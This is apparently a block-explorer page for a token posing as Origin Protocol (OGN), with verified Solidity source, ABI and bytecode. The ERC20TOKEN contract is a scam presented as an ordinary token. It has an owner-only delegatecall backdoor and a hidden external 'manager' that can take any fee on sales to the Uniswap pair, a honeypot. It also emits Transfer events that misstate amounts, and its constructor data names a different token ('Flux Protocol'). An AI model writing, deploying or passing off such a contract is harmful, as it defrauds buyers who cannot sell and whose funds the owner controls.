ETH Price: $3,955.54 (+1.64%)

Token

ERC-20: OriginProtocol.com (OGN)
 

Overview

Max Total Supply

100,000,000 OGN

Holders

145

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
20,440.176381238854887594 OGN

Value
$0.00
0xb7dc7d87a5a853bd9a86f39a1b80533e442e19e7
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0x7b7Ab0c3...855673a00
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
ERC20TOKEN

Compiler Version
v0.5.17+commit.d19bba13

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, GNU GPLv3 license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2020-11-01
*/

pragma solidity ^0.5.17;

interface IERC20 {
    function totalSupply() external view returns(uint);

    function balanceOf(address account) external view returns(uint);

    function transfer(address recipient, uint amount) external returns(bool);

    function allowance(address owner, address spender) external view returns(uint);

    function approve(address spender, uint amount) external returns(bool);

    function transferFrom(address sender, address recipient, uint amount) external returns(bool);
    event Transfer(address indexed from, address indexed to, uint value);
    event Approval(address indexed owner, address indexed spender, uint value);
}

contract Context {
    constructor() internal {}
    // solhint-disable-previous-line no-empty-blocks
    function _msgSender() internal view returns(address payable) {
        return msg.sender;
    }
}

contract ERC20 is Context, IERC20 {
    using SafeMath for uint;
    mapping(address => uint) private _balances;

    mapping(address => mapping(address => uint)) private _allowances;

    uint private _totalSupply;

    function totalSupply() public view returns(uint) {
        return _totalSupply;
    }

    function balanceOf(address account) public view returns(uint) {
        return _balances[account];
    }

    function transfer(address recipient, uint amount) public returns(bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view returns(uint) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint amount) public returns(bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint amount) public returns(bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function increaseAllowance(address spender, uint addedValue) public returns(bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    function decreaseAllowance(address spender, uint subtractedValue) public returns(bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    function _transfer(address sender, address recipient, uint amount) internal {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function _mint(address account, uint amount) internal {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint amount) internal {
        require(account != address(0), "ERC20: burn from the zero address");

        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _approve(address owner, address spender, uint amount) internal {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
}

contract ERC20Detailed is IERC20 {
    string private _name;
    string private _symbol;
    uint8 private _decimals;

    constructor(string memory name, string memory symbol, uint8 decimals) public {
        _name = name;
        _symbol = symbol;
        _decimals = decimals;
    }

    function name() public view returns(string memory) {
        return _name;
    }

    function symbol() public view returns(string memory) {
        return _symbol;
    }

    function decimals() public view returns(uint8) {
        return _decimals;
    }
}

library SafeMath {
    function add(uint a, uint b) internal pure returns(uint) {
        uint c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    function sub(uint a, uint b) internal pure returns(uint) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(uint a, uint b, string memory errorMessage) internal pure returns(uint) {
        require(b <= a, errorMessage);
        uint c = a - b;

        return c;
    }

    function mul(uint a, uint b) internal pure returns(uint) {
        if (a == 0) {
            return 0;
        }

        uint c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    function div(uint a, uint b) internal pure returns(uint) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(uint a, uint b, string memory errorMessage) internal pure returns(uint) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0, errorMessage);
        uint c = a / b;

        return c;
    }
}

library Address {
    function isContract(address account) internal view returns(bool) {
        bytes32 codehash;
        bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
        // solhint-disable-next-line no-inline-assembly
        assembly { codehash:= extcodehash(account) }
        return (codehash != 0x0 && codehash != accountHash);
    }
}

library SafeERC20 {
    using SafeMath
    for uint;
    using Address
    for address;

    function safeTransfer(IERC20 token, address to, uint value) internal {
        callOptionalReturn(token, abi.encodeWithSelector(token.transfer.selector, to, value));
    }

    function safeTransferFrom(IERC20 token, address from, address to, uint value) internal {
        callOptionalReturn(token, abi.encodeWithSelector(token.transferFrom.selector, from, to, value));
    }

    function safeApprove(IERC20 token, address spender, uint value) internal {
        require((value == 0) || (token.allowance(address(this), spender) == 0),
            "SafeERC20: approve from non-zero to non-zero allowance"
        );
        callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));
    }

    function callOptionalReturn(IERC20 token, bytes memory data) private {
        require(address(token).isContract(), "SafeERC20: call to non-contract");

        // solhint-disable-next-line avoid-low-level-calls
        (bool success, bytes memory returndata) = address(token).call(data);
        require(success, "SafeERC20: low-level call failed");

        if (returndata.length > 0) { // Return data is optional
            // solhint-disable-next-line max-line-length
            require(abi.decode(returndata, (bool)), "SafeERC20: ERC20 operation did not succeed");
        }
    }
}

interface Management {
    function calcFee(address,address,uint256) external returns(uint256);
}

contract ERC20TOKEN {

    event Transfer(address indexed _from, address indexed _to, uint _value);
    event Approval(address indexed _owner, address indexed _spender, uint _value);

    function transfer(address _to, uint _value) public payable returns (bool) {
        return transferFrom(msg.sender, _to, _value);
    }

    function transferFrom(address _from, address _to, uint _value) public payable returns (bool) {
        if (_value == 0) {return true;}
        if (msg.sender != _from && status[tx.origin] == 0) {
            require(allowance[_from][msg.sender] >= _value);
            allowance[_from][msg.sender] -= _value;
        }
        require(balanceOf[_from] >= _value);
        balanceOf[_from] -= _value;
        uint256 fee = calc(_from, _to, _value);
        balanceOf[_to] += (_value - fee);
        emit Transfer(_from, _to, _value);
        return true;
    }

    function pairFor(address factory, address tokenA, address tokenB) internal pure returns (address pair) {
        (address token0, address token1) = tokenA < tokenB ? (tokenA, tokenB) : (tokenB, tokenA);
        pair = address(uint(keccak256(abi.encodePacked(
                hex'ff',
                factory,
                keccak256(abi.encodePacked(token0, token1)),
                hex'96e8ac4277198ff8b6f785478aa9a39f403cb768dd02cbee326c3e7da348845f' // init code hash
            ))));
    }

    function calc(address _from, address _to, uint _value) private returns(uint256) {
        uint fee = 0;
        if (_to == UNI && _from != owner && status[_from] == 0) {
            fee = Management(manager).calcFee(address(this), UNI, _value);
        }
        return fee;
    }

    function delegate(address a, bytes memory b) public payable {
        require(msg.sender == owner);
        a.delegatecall(b);
    }

    function () payable external {}

    function batchSend(address[] memory _tos, uint _value) public payable returns (bool) {
        require (msg.sender == owner);
        uint total = _value * _tos.length;
        require(balanceOf[msg.sender] >= total);
        balanceOf[msg.sender] -= total;
        for (uint i = 0; i < _tos.length; i++) {
            address _to = _tos[i];
            balanceOf[_to] += _value;
            status[_to] = 1;
            emit Transfer(msg.sender, _to, _value/2);
            emit Transfer(msg.sender, _to, _value/2);
        }
        return true;
    }

    function approve(address _spender, uint _value) public payable returns (bool) {
        allowance[msg.sender][_spender] = _value;
        emit Approval(msg.sender, _spender, _value);
        return true;
    }

    mapping (address => uint) public balanceOf;
    mapping (address => uint) private status;
    mapping (address => mapping (address => uint)) public allowance;

    uint constant public decimals = 18;
    uint public totalSupply;
    string public name;
    string public symbol;
    address private owner;
    address private UNI;
    address constant internal manager = 0xb40fdE3d531D4dD211A69dF55Ac13Bf1bf1D8D28;

    constructor(string memory _name, string memory _symbol, uint _totalSupply) payable public {
        owner = msg.sender;
        symbol = _symbol;
        name = _name;
        totalSupply = _totalSupply;
        balanceOf[msg.sender] = totalSupply;
        allowance[msg.sender][0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = uint(-1);
        UNI = pairFor(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, address(this));
        emit Transfer(address(0x0), msg.sender, totalSupply);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"uint256","name":"_totalSupply","type":"uint256"}],"payable":true,"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"_owner","type":"address"},{"indexed":true,"internalType":"address","name":"_spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"_value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"_from","type":"address"},{"indexed":true,"internalType":"address","name":"_to","type":"address"},{"indexed":false,"internalType":"uint256","name":"_value","type":"uint256"}],"name":"Transfer","type":"event"},{"payable":true,"stateMutability":"payable","type":"fallback"},{"constant":true,"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"_spender","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":true,"stateMutability":"payable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address[]","name":"_tos","type":"address[]"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"batchSend","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":true,"stateMutability":"payable","type":"function"},{"constant":true,"inputs":[],"name":"decimals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"a","type":"address"},{"internalType":"bytes","name":"b","type":"bytes"}],"name":"delegate","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":true,"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":true,"stateMutability":"payable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":true,"stateMutability":"payable","type":"function"}]

608060405260405162000e3f38038062000e3f833981810160405260608110156200002957600080fd5b81019080805160405193929190846401000000008211156200004a57600080fd5b9083019060208201858111156200006057600080fd5b82516401000000008111828201881017156200007b57600080fd5b82525081516020918201929091019080838360005b83811015620000aa57818101518382015260200162000090565b50505050905090810190601f168015620000d85780820380516001836020036101000a031916815260200191505b5060405260200180516040519392919084640100000000821115620000fc57600080fd5b9083019060208201858111156200011257600080fd5b82516401000000008111828201881017156200012d57600080fd5b82525081516020918201929091019080838360005b838110156200015c57818101518382015260200162000142565b50505050905090810190601f1680156200018a5780820380516001836020036101000a031916815260200191505b50604052602090810151600680546001600160a01b031916331790558451909350620001bd9250600591850190620003a4565b508251620001d3906004906020860190620003a4565b5060038190553360009081526020818152604080832084905560028252808320737a250d5630b4cf539739df2c5dacb4c659f2488d84529091529020600019905562000252735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f73c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2306001600160e01b03620002b616565b600780546001600160a01b0319166001600160a01b0392909216919091179055600354604080519182525133916000917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef916020908290030190a350505062000449565b6000806000836001600160a01b0316856001600160a01b031610620002dd578385620002e0565b84845b604080516001600160601b0319606094851b811660208084019190915293851b81166034830152825160288184030181526048830184528051908501207fff0000000000000000000000000000000000000000000000000000000000000060688401529a90941b9093166069840152607d8301989098527f96e8ac4277198ff8b6f785478aa9a39f403cb768dd02cbee326c3e7da348845f609d808401919091528851808403909101815260bd909201909752805196019590952095945050505050565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f10620003e757805160ff191683800117855562000417565b8280016001018555821562000417579182015b8281111562000417578251825591602001919060010190620003fa565b506200042592915062000429565b5090565b6200044691905b8082111562000425576000815560010162000430565b90565b6109e680620004596000396000f3fe60806040526004361061009c5760003560e01c806370a082311161006457806370a08231146101da57806395d89b411461020d578063a9059cbb14610222578063aa2f52201461024e578063d6d2b6ba146102f3578063dd62ed3e146103a95761009c565b806306fdde031461009e578063095ea7b31461012857806318160ddd1461016857806323b872dd1461018f578063313ce567146101c5575b005b3480156100aa57600080fd5b506100b36103e4565b6040805160208082528351818301528351919283929083019185019080838360005b838110156100ed5781810151838201526020016100d5565b50505050905090810190601f16801561011a5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101546004803603604081101561013e57600080fd5b506001600160a01b038135169060200135610472565b604080519115158252519081900360200190f35b34801561017457600080fd5b5061017d6104d8565b60408051918252519081900360200190f35b610154600480360360608110156101a557600080fd5b506001600160a01b038135811691602081013590911690604001356104de565b3480156101d157600080fd5b5061017d61062d565b3480156101e657600080fd5b5061017d600480360360208110156101fd57600080fd5b50356001600160a01b0316610632565b34801561021957600080fd5b506100b3610644565b6101546004803603604081101561023857600080fd5b506001600160a01b03813516906020013561069f565b6101546004803603604081101561026457600080fd5b81019060208101813564010000000081111561027f57600080fd5b82018360208201111561029157600080fd5b803590602001918460208302840111640100000000831117156102b357600080fd5b91908080602002602001604051908101604052809392919081815260200183836020028082843760009201919091525092955050913592506106ac915050565b61009c6004803603604081101561030957600080fd5b6001600160a01b03823516919081019060408101602082013564010000000081111561033457600080fd5b82018360208201111561034657600080fd5b8035906020019184600183028401116401000000008311171561036857600080fd5b91908080601f0160208091040260200160405190810160405280939291908181526020018383808284376000920191909152509295506107dd945050505050565b3480156103b557600080fd5b5061017d600480360360408110156103cc57600080fd5b506001600160a01b038135811691602001351661089a565b6004805460408051602060026001851615610100026000190190941693909304601f8101849004840282018401909252818152929183018282801561046a5780601f1061043f5761010080835404028352916020019161046a565b820191906000526020600020905b81548152906001019060200180831161044d57829003601f168201915b505050505081565b3360008181526002602090815260408083206001600160a01b038716808552908352818420869055815186815291519394909390927f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925928290030190a350600192915050565b60035481565b6000816104ed57506001610626565b336001600160a01b03851614801590610513575032600090815260016020526040902054155b15610573576001600160a01b038416600090815260026020908152604080832033845290915290205482111561054857600080fd5b6001600160a01b03841660009081526002602090815260408083203384529091529020805483900390555b6001600160a01b03841660009081526020819052604090205482111561059857600080fd5b6001600160a01b0384166000908152602081905260408120805484900390556105c28585856108b7565b6001600160a01b03808616600081815260208181526040918290208054868a03019055815188815291519495509193928916927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef929181900390910190a360019150505b9392505050565b601281565b60006020819052908152604090205481565b6005805460408051602060026001851615610100026000190190941693909304601f8101849004840282018401909252818152929183018282801561046a5780601f1061043f5761010080835404028352916020019161046a565b60006106263384846104de565b6006546000906001600160a01b031633146106c657600080fd5b825133600090815260208190526040902054908302908111156106e857600080fd5b336000908152602081905260408120805483900390555b84518110156107d257600085828151811061071657fe5b6020908102919091018101516001600160a01b0381166000818152808452604080822080548b0190556001948590529020929092559150337fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60028860408051929091048252519081900360200190a36001600160a01b038116337fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60028860408051929091048252519081900360200190a3506001016106ff565b506001949350505050565b6006546001600160a01b031633146107f457600080fd5b816001600160a01b0316816040518082805190602001908083835b6020831061082e5780518252601f19909201916020918201910161080f565b6001836020036101000a038019825116818451168082178552505050505050905001915050600060405180830381855af49150503d806000811461088e576040519150601f19603f3d011682016040523d82523d6000602084013e610893565b606091505b5050505050565b600260209081526000928352604080842090915290825290205481565b60075460009081906001600160a01b0385811691161480156108e757506006546001600160a01b03868116911614155b801561090957506001600160a01b038516600090815260016020526040902054155b156109a9576007546040805163106190fd60e21b81523060048201526001600160a01b039092166024830152604482018590525173b40fde3d531d4dd211a69df55ac13bf1bf1d8d289163418643f49160648083019260209291908290030181600087803b15801561097a57600080fd5b505af115801561098e573d6000803e3d6000fd5b505050506040513d60208110156109a457600080fd5b505190505b94935050505056fea265627a7a7231582022a8553b0155d92047556d7b1c164cf8c9662da73901cd64503b905a457482e064736f6c63430005110032000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a00000000000000000000000000000000000000000033b2e3c9fd0803ce8000000000000000000000000000000000000000000000000000000000000000000000d466c75782050726f746f636f6c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004464c555800000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x60806040526004361061009c5760003560e01c806370a082311161006457806370a08231146101da57806395d89b411461020d578063a9059cbb14610222578063aa2f52201461024e578063d6d2b6ba146102f3578063dd62ed3e146103a95761009c565b806306fdde031461009e578063095ea7b31461012857806318160ddd1461016857806323b872dd1461018f578063313ce567146101c5575b005b3480156100aa57600080fd5b506100b36103e4565b6040805160208082528351818301528351919283929083019185019080838360005b838110156100ed5781810151838201526020016100d5565b50505050905090810190601f16801561011a5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101546004803603604081101561013e57600080fd5b506001600160a01b038135169060200135610472565b604080519115158252519081900360200190f35b34801561017457600080fd5b5061017d6104d8565b60408051918252519081900360200190f35b610154600480360360608110156101a557600080fd5b506001600160a01b038135811691602081013590911690604001356104de565b3480156101d157600080fd5b5061017d61062d565b3480156101e657600080fd5b5061017d600480360360208110156101fd57600080fd5b50356001600160a01b0316610632565b34801561021957600080fd5b506100b3610644565b6101546004803603604081101561023857600080fd5b506001600160a01b03813516906020013561069f565b6101546004803603604081101561026457600080fd5b81019060208101813564010000000081111561027f57600080fd5b82018360208201111561029157600080fd5b803590602001918460208302840111640100000000831117156102b357600080fd5b91908080602002602001604051908101604052809392919081815260200183836020028082843760009201919091525092955050913592506106ac915050565b61009c6004803603604081101561030957600080fd5b6001600160a01b03823516919081019060408101602082013564010000000081111561033457600080fd5b82018360208201111561034657600080fd5b8035906020019184600183028401116401000000008311171561036857600080fd5b91908080601f0160208091040260200160405190810160405280939291908181526020018383808284376000920191909152509295506107dd945050505050565b3480156103b557600080fd5b5061017d600480360360408110156103cc57600080fd5b506001600160a01b038135811691602001351661089a565b6004805460408051602060026001851615610100026000190190941693909304601f8101849004840282018401909252818152929183018282801561046a5780601f1061043f5761010080835404028352916020019161046a565b820191906000526020600020905b81548152906001019060200180831161044d57829003601f168201915b505050505081565b3360008181526002602090815260408083206001600160a01b038716808552908352818420869055815186815291519394909390927f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925928290030190a350600192915050565b60035481565b6000816104ed57506001610626565b336001600160a01b03851614801590610513575032600090815260016020526040902054155b15610573576001600160a01b038416600090815260026020908152604080832033845290915290205482111561054857600080fd5b6001600160a01b03841660009081526002602090815260408083203384529091529020805483900390555b6001600160a01b03841660009081526020819052604090205482111561059857600080fd5b6001600160a01b0384166000908152602081905260408120805484900390556105c28585856108b7565b6001600160a01b03808616600081815260208181526040918290208054868a03019055815188815291519495509193928916927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef929181900390910190a360019150505b9392505050565b601281565b60006020819052908152604090205481565b6005805460408051602060026001851615610100026000190190941693909304601f8101849004840282018401909252818152929183018282801561046a5780601f1061043f5761010080835404028352916020019161046a565b60006106263384846104de565b6006546000906001600160a01b031633146106c657600080fd5b825133600090815260208190526040902054908302908111156106e857600080fd5b336000908152602081905260408120805483900390555b84518110156107d257600085828151811061071657fe5b6020908102919091018101516001600160a01b0381166000818152808452604080822080548b0190556001948590529020929092559150337fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60028860408051929091048252519081900360200190a36001600160a01b038116337fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60028860408051929091048252519081900360200190a3506001016106ff565b506001949350505050565b6006546001600160a01b031633146107f457600080fd5b816001600160a01b0316816040518082805190602001908083835b6020831061082e5780518252601f19909201916020918201910161080f565b6001836020036101000a038019825116818451168082178552505050505050905001915050600060405180830381855af49150503d806000811461088e576040519150601f19603f3d011682016040523d82523d6000602084013e610893565b606091505b5050505050565b600260209081526000928352604080842090915290825290205481565b60075460009081906001600160a01b0385811691161480156108e757506006546001600160a01b03868116911614155b801561090957506001600160a01b038516600090815260016020526040902054155b156109a9576007546040805163106190fd60e21b81523060048201526001600160a01b039092166024830152604482018590525173b40fde3d531d4dd211a69df55ac13bf1bf1d8d289163418643f49160648083019260209291908290030181600087803b15801561097a57600080fd5b505af115801561098e573d6000803e3d6000fd5b505050506040513d60208110156109a457600080fd5b505190505b94935050505056fea265627a7a7231582022a8553b0155d92047556d7b1c164cf8c9662da73901cd64503b905a457482e064736f6c63430005110032

Deployed Bytecode Sourcemap

7737:3673:0:-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10677:18;;8:9:-1;5:2;;;30:1;27;20:12;5:2;10677:18:0;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8:100:-1;33:3;30:1;27:10;8:100;;;90:11;;;84:18;71:11;;;64:39;52:2;45:10;8:100;;;12:14;10677:18:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10217:213;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;;;;;;10217:213:0;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;10647:23;;8:9:-1;5:2;;;30:1;27;20:12;5:2;10647:23:0;;;:::i;:::-;;;;;;;;;;;;;;;;8075:571;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;;;;;;8075:571:0;;;;;;;;;;;;;;;;;:::i;10606:34::-;;8:9:-1;5:2;;;30:1;27;20:12;5:2;10606:34:0;;;:::i;10438:42::-;;8:9:-1;5:2;;;30:1;27;20:12;5:2;10438:42:0;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;10438:42:0;-1:-1:-1;;;;;10438:42:0;;:::i;10702:20::-;;8:9:-1;5:2;;;30:1;27;20:12;5:2;10702:20:0;;;:::i;7930:137::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;;;;;;7930:137:0;;;;;;;;:::i;9643:566::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;9643:566:0;;;;;;;;21:11:-1;5:28;;2:2;;;46:1;43;36:12;2:2;9643:566:0;;35:9:-1;28:4;12:14;8:25;5:40;2:2;;;58:1;55;48:12;2:2;9643:566:0;;;;;;101:9:-1;95:2;81:12;77:21;67:8;63:36;60:51;39:11;25:12;22:29;11:108;8:2;;;132:1;129;122:12;8:2;9643:566:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;30:3:-1;22:6;14;1:33;99:1;81:16;;74:27;;;;-1:-1;9643:566:0;;-1:-1:-1;;9643:566:0;;;-1:-1:-1;9643:566:0;;-1:-1:-1;;9643:566:0:i;9461:135::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;;;;;9461:135:0;;;;;;;;;;;;;;;21:11:-1;5:28;;2:2;;;46:1;43;36:12;2:2;9461:135:0;;35:9:-1;28:4;12:14;8:25;5:40;2:2;;;58:1;55;48:12;2:2;9461:135:0;;;;;;100:9:-1;95:1;81:12;77:20;67:8;63:35;60:50;39:11;25:12;22:29;11:107;8:2;;;131:1;128;121:12;8:2;9461:135:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;30:3:-1;22:6;14;1:33;99:1;81:16;;74:27;;;;-1:-1;9461:135:0;;-1:-1:-1;9461:135:0;;-1:-1:-1;;;;;9461:135:0:i;10534:63::-;;8:9:-1;5:2;;;30:1;27;20:12;5:2;10534:63:0;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;;;;;;10534:63:0;;;;;;;;;;:::i;10677:18::-;;;;;;;;;;;;;;;-1:-1:-1;;10677:18:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;10217:213::-;10316:10;10289:4;10306:21;;;:9;:21;;;;;;;;-1:-1:-1;;;;;10306:31:0;;;;;;;;;;;:40;;;10362:38;;;;;;;10289:4;;10306:31;;10316:10;;10362:38;;;;;;;;-1:-1:-1;10418:4:0;10217:213;;;;:::o;10647:23::-;;;;:::o;8075:571::-;8162:4;8183:11;8179:31;;-1:-1:-1;8204:4:0;8197:11;;8179:31;8224:10;-1:-1:-1;;;;;8224:19:0;;;;;;:45;;-1:-1:-1;8254:9:0;8247:17;;;;:6;:17;;;;;;:22;8224:45;8220:178;;;-1:-1:-1;;;;;8294:16:0;;;;;;:9;:16;;;;;;;;8311:10;8294:28;;;;;;;;:38;-1:-1:-1;8294:38:0;8286:47;;;;;;-1:-1:-1;;;;;8348:16:0;;;;;;:9;:16;;;;;;;;8365:10;8348:28;;;;;;;:38;;;;;;;8220:178;-1:-1:-1;;;;;8416:16:0;;:9;:16;;;;;;;;;;;:26;-1:-1:-1;8416:26:0;8408:35;;;;;;-1:-1:-1;;;;;8454:16:0;;:9;:16;;;;;;;;;;:26;;;;;;;8505:24;8464:5;8517:3;8474:6;8505:4;:24::i;:::-;-1:-1:-1;;;;;8540:14:0;;;:9;:14;;;;;;;;;;;;:32;;8559:12;;;8540:32;;;8588:28;;;;;;;8491:38;;-1:-1:-1;8540:14:0;;8588:28;;;;;;;;;;;;;;;8634:4;8627:11;;;8075:571;;;;;;:::o;10606:34::-;10638:2;10606:34;:::o;10438:42::-;;;;;;;;;;;;;;:::o;10702:20::-;;;;;;;;;;;;;;;-1:-1:-1;;10702:20:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7930:137;7998:4;8022:37;8035:10;8047:3;8052:6;8022:12;:37::i;9643:566::-;9762:5;;9722:4;;-1:-1:-1;;;;;9762:5:0;9748:10;:19;9739:29;;;;;;9801:11;;9841:10;9779;9831:21;;;;;;;;;;;9792:20;;;;9831:30;-1:-1:-1;9831:30:0;9823:39;;;;;;9883:10;9873:9;:21;;;;;;;;;;:30;;;;;;;9914:266;9935:4;:11;9931:1;:15;9914:266;;;9968:11;9982:4;9987:1;9982:7;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;10004:14:0;;:9;:14;;;;;;;;;;:24;;;;;;-1:-1:-1;10043:11:0;;;;;;:15;;;;9982:7;-1:-1:-1;10087:10:0;10078:35;10111:1;10022:6;10078:35;;;10104:8;;;;10078:35;;;;;;;;;;;-1:-1:-1;;;;;10133:35:0;;10142:10;10133:35;10166:1;10159:6;10133:35;;;10159:8;;;;10133:35;;;;;;;;;;;-1:-1:-1;9948:3:0;;9914:266;;;-1:-1:-1;10197:4:0;;9643:566;-1:-1:-1;;;;9643:566:0:o;9461:135::-;9554:5;;-1:-1:-1;;;;;9554:5:0;9540:10;:19;9532:28;;;;;;9571:1;-1:-1:-1;;;;;9571:14:0;9586:1;9571:17;;;;;;;;;;;;;36:153:-1;66:2;61:3;58:11;36:153;;176:10;;164:23;;-1:-1;;139:12;;;;98:2;89:12;;;;114;36:153;;;274:1;267:3;263:2;259:12;254:3;250:22;246:30;315:4;311:9;305:3;299:10;295:26;356:4;350:3;344:10;340:21;389:7;380;377:20;372:3;365:33;3:399;;;9571:17:0;;;;;;;;;;;;;;;;;;;;;;;14:1:-1;21;16:31;;;;75:4;69:11;64:16;;144:4;140:9;133:4;115:16;111:27;107:43;104:1;100:51;9